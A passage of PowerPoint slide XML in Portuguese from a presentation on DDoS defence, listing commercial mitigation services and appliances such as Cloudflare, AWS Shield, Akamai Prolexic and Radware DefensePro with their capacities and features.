            <a:ext cx="7581333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Combine múltiplas técnicas em uma estratégia de defesa em camadas. Para ataques volumétricos, use scrubbing centers e redes Anycast. Para ataques na camada de aplicação, implemente WAFs e detecção baseada em comportamento.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="12201525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53" name="Text 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="12287250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54" name="Text 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8365220" y="12287250"/>
            <a:ext cx="5644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11/14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="78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2082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Mitigação e Defesa: Ferramentas e Serviços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Soluções comerciais disponíveis para proteção contra DDoS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71625"/>
            <a:ext cx="8158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mercado oferece uma variedade de soluções comerciais para proteção contra DDoS, desde serviços baseados em nuvem até appliances dedicados e soluções híbridas.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285750" y="2200275"/>
            <a:ext cx="2762231" cy="1493044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2624017" y="2271713"/>
            <a:ext cx="352527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624017" y="2271713"/>
            <a:ext cx="423965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Nuvem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1313613" y="2386013"/>
            <a:ext cx="7779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Cloudflare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400050" y="2743200"/>
            <a:ext cx="26050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Proteção DDoS integrada à CDN global, com capacidade de mitigação de múltiplos Tbps.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="3114675"/>
            <a:ext cx="392237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00050" y="3114675"/>
            <a:ext cx="463674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Anycast</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820862" y="3114675"/>
            <a:ext cx="273025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820862" y="3114675"/>
            <a:ext cx="344463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WAF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122462" y="3114675"/>
            <a:ext cx="566756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1122462" y="3114675"/>
            <a:ext cx="638194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Rate Limiting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1717793" y="3114675"/>
            <a:ext cx="689818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1717793" y="3114675"/>
            <a:ext cx="761256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Bot Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="3345061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27" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909796" y="3345061"/>
            <a:ext cx="50120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175+ Tbps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="3459361"/>
            <a:ext cx="91945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Pontos de Presença:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248063" y="3459361"/>
            <a:ext cx="924558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300+ em 100+ países</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3190856" y="2200275"/>
            <a:ext cx="2762259" cy="1493044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1" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5529151" y="2271713"/>
            <a:ext cx="352527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32" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5529151" y="2271713"/>
            <a:ext cx="423965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Nuvem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4175047" y="2386013"/>
            <a:ext cx="86528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AWS Shield</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="2743200"/>
            <a:ext cx="26050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Serviço gerenciado de proteção DDoS integrado ao ecossistema AWS.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="3114675"/>
            <a:ext cx="658118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36" name="Text 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="3114675"/>
            <a:ext cx="729555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Shield Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3991849" y="3114675"/>
            <a:ext cx="687279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38" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3991849" y="3114675"/>
            <a:ext cx="758716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Shield Advanced</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707703" y="3114675"/>
            <a:ext cx="273025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40" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707703" y="3114675"/>
            <a:ext cx="344463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WAF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5009304" y="3114675"/>
            <a:ext cx="41601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42" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5009304" y="3114675"/>
            <a:ext cx="487449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Route 53</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="3345061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44" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3814902" y="3345061"/>
            <a:ext cx="64335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Não divulgada</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="3459361"/>
            <a:ext cx="53352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Integração:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3767240" y="3459361"/>
            <a:ext cx="1349778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Serviços AWS (CloudFront, ELB)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095991" y="2200275"/>
            <a:ext cx="2762231" cy="1493044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8" name="Shape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8434257" y="2271713"/>
            <a:ext cx="352527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49" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8434257" y="2271713"/>
            <a:ext cx="423965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Nuvem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7222945" y="2386013"/>
            <a:ext cx="57973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Akamai</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="2743200"/>
            <a:ext cx="26050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Prolexic e Kona Site Defender oferecem proteção contra ataques volumétricos e na camada de aplicação.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="3114675"/>
            <a:ext cx="39229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3" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="3114675"/>
            <a:ext cx="463730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Prolexic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631158" y="3114675"/>
            <a:ext cx="292894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5" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631158" y="3114675"/>
            <a:ext cx="36433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Kona</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6952627" y="3114675"/>
            <a:ext cx="753387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7" name="Text 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6952627" y="3114675"/>
            <a:ext cx="824824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Scrubbing Centers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Shape 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7734588" y="3114675"/>
            <a:ext cx="273025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9" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7734588" y="3114675"/>
            <a:ext cx="344463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WAF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="3345061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61" name="Text 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720036" y="3345061"/>
            <a:ext cx="50120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100+ Tbps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="3459361"/>
            <a:ext cx="86687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Scrubbing Centers:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7005731" y="3459361"/>
            <a:ext cx="53614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20+ globais</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="3821906"/>
            <a:ext cx="2762231" cy="165735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65" name="Shape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2520851" y="3893344"/>
            <a:ext cx="455693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66" name="Text 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2520851" y="3893344"/>
            <a:ext cx="52713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Appliance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027974" y="4007644"/>
            <a:ext cx="13492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Fortinet FortiDDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4364831"/>
            <a:ext cx="26050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Appliances dedicados para proteção contra DDoS com detecção baseada em comportamento.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Shape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4736306"/>
            <a:ext cx="78129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0" name="Text 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4736306"/>
            <a:ext cx="852729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Hardware Dedicado</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Shape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1209917" y="4736306"/>
            <a:ext cx="955867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2" name="Text 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1209917" y="4736306"/>
            <a:ext cx="1027305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Comportamental</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2194359" y="4736306"/>
            <a:ext cx="614614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4" name="Text 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2194359" y="4736306"/>
            <a:ext cx="68605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Baixa Latência</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Shape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4900613"/>
            <a:ext cx="812964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6" name="Text 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4900613"/>
            <a:ext cx="884402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 FortiGate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Text 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="5130998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78" name="Text 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909796" y="5130998"/>
            <a:ext cx="115329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Até 100 Gbps por appliance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="5245298"/>
            <a:ext cx="60018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Implantação:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Text 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928799" y="5245298"/>
            <a:ext cx="124831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On-premise ou nuvem privada</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3190856" y="3821906"/>
            <a:ext cx="2762259" cy="165735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82" name="Shape 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5425985" y="3893344"/>
            <a:ext cx="455693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83" name="Text 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5425985" y="3893344"/>
            <a:ext cx="52713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Appliance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Text 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3857318" y="4007644"/>
            <a:ext cx="150074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Radware DefensePro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Text 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="4364831"/>
            <a:ext cx="26050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Proteção em tempo real contra ataques DDoS com tecnologia de mitigação comportamental.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="4736306"/>
            <a:ext cx="642324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87" name="Text 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="4736306"/>
            <a:ext cx="71376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Behavioral DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Shape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3976055" y="4736306"/>
            <a:ext cx="625050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89" name="Text 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3976055" y="4736306"/>
            <a:ext cx="696488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SSL Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Shape 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629680" y="4736306"/>
            <a:ext cx="78129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91" name="Text 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629680" y="4736306"/>
            <a:ext cx="852729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Hardware Dedicado</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Shape 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="4900613"/>
            <a:ext cx="614614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93" name="Text 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="4900613"/>
            <a:ext cx="68605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Baixa Latência</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Text 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="5130998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95" name="Text 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3814902" y="5130998"/>
            <a:ext cx="115329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Até 400 Gbps por appliance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Text 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3305156" y="5245298"/>
            <a:ext cx="54610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Tecnologia:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Text 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779825" y="5245298"/>
            <a:ext cx="1076669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BDOS (Behavioral DDoS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Shape 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095991" y="3821906"/>
            <a:ext cx="2762231" cy="165735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9" name="Shape 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8331091" y="3893344"/>
            <a:ext cx="455693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100" name="Text 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8331091" y="3893344"/>
            <a:ext cx="527131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Appliance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Text 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6791781" y="4007644"/>
            <a:ext cx="144208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Netscout Arbor AED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Text 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="4364831"/>
            <a:ext cx="26050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Arbor Edge Defense (AED) oferece proteção contra DDoS na borda da rede.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Shape 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="4736306"/>
            <a:ext cx="75997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04" name="Text 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="4736306"/>
            <a:ext cx="831410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ATLAS Intelligence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
